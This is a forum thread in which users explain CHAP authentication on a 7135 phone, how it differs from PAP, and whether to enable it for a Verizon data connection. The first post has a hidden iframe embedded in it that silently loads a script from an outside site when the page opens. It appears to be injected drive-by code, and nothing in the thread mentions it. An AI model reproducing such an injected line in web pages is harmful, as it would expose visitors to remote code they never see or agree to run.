+ Reply to Thread

CHAP Authentication on 7135

My 7135 is set with the "Enable CHAP Authentication" in the disabled selection. What is CHAP?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

CHAP is a security feature that is supported on lines using PPP encapsulation, which prevents unauthorized access by identifying the remote end. The router or access server then determines whether that user is allowed access. You will configure a loopback interface, set an asynchronous interface to use PPP encapsulation, and activate and configure CHAP authentication on that interface.

You might want to explain that in English for the readers that don't do IT for a living...

Yeah, I couldn't undertand a word of it and I have a master's degree.

It's a more secure for of network authentication. It's designed to keep me from pretending to be you once you're logged into the network.

Yes it's a level of security that prevents people from "spoofing" a connection. It's almost like MAC address filtering. It's something that may or may not be used by your carrier. If it gives you trouble, uncheck it. IUt shouldn't though. Turning it on is jsut telling the device to expect to send additional information to be allowed to use the network.

In the dialup world (i.e., your computer dialing into AOL with a modem) CHAP is a way of securely sending your password to the far end (server/AOL). During the authentication phase (at the beginning of your call), you have to send your username and password. CHAP is a way of securely sending your password so an eavesdropper cannot see your password in clear text. (sort of like encrypting your password, but not exactly). The other main choice used is PAP, which sends your password in clear text.

CHAP/PAP is a function of the software, not the modem itself, so I'm not sure where this comes into play on the cell phone. Perhaps for the Mobile Web (if I got the name right) and new 3G stuff, where your phone does everything, not just acting as a modem connected to your computer.

CHAP should be enabled, if supported. If you can't connect after enabling it then the far end does not support it and you should leave it disabled.

+ralph

I just configured an Alltel 7135 for Verizon. At least for a qnc (non-express network) data connection, the connection would not work until i enabled "CHAP".